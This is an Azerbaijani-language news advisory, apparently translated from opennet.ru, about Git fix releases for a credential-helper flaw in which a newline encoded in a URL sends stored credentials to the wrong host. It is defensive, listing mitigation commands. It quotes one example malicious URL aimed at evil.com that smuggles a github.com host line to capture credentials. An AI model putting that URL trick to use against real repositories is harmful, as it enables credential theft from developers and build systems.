paylanmış mənbə idarəetmə sisteminin düzəldici buraxılışları Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 və 2.17.4, aradan qaldıran () idarəedicidə "", git müştəri yeni sətir simvolu olan xüsusi formatlaşdırılmış URL-dən istifadə edərək depoya daxil olduqda, etimadnamələrin yanlış hosta göndərilməsinə səbəb olur. Zəiflikdən başqa hostdan etimadnamələrin təcavüzkar tərəfindən idarə olunan serverə göndərilməsini təşkil etmək üçün istifadə oluna bilər.
“https://evil.com?%0ahost=github.com/” kimi URL-i təyin edərkən evil.com host-a qoşularkən etimadnamə idarəçisi github.com üçün müəyyən edilmiş autentifikasiya parametrlərini keçirəcək. Problem, alt modullar üçün URL-lərin işlənməsi daxil olmaqla, "git klonu" kimi əməliyyatları yerinə yetirərkən baş verir (məsələn, "git submodule update" avtomatik olaraq repozitoriyadan .gitmodules faylında göstərilən URL-ləri emal edəcək). Zəiflik, tərtibatçının URL-i görmədən anbarı klonlaşdırdığı hallarda, məsələn, alt modullarla işləyərkən və ya avtomatik hərəkətləri yerinə yetirən sistemlərdə, məsələn, paket qurma skriptlərində ən təhlükəlidir.
Yeni versiyalarda zəiflikləri bloklamaq üçün etimadnamə mübadiləsi protokolu vasitəsilə ötürülən hər hansı bir dəyərdə yeni sətir xarakterinin keçməsi. Dağıtımlar üçün səhifələrdə paket yeniləmələrinin buraxılışını izləyə bilərsiniz , , , , , , .
Problemin qarşısını almaq üçün həll yolu kimi İctimai repozitoriyalara daxil olarkən credential.helper istifadə etməyin və yoxlanılmamış depolarla "--recurse-submodules" rejimində "git clone" istifadə etməyin. credential.helper işləyicisini tamamilə söndürmək üçün və parolların alınması , qorunur və ya parolları olan bir fayl üçün əmrlərdən istifadə edə bilərsiniz:
git config --unset credential.helper
git config --qlobal --unset credential.helper
git config --system --unset credential.helper
Mənbə: opennet.ru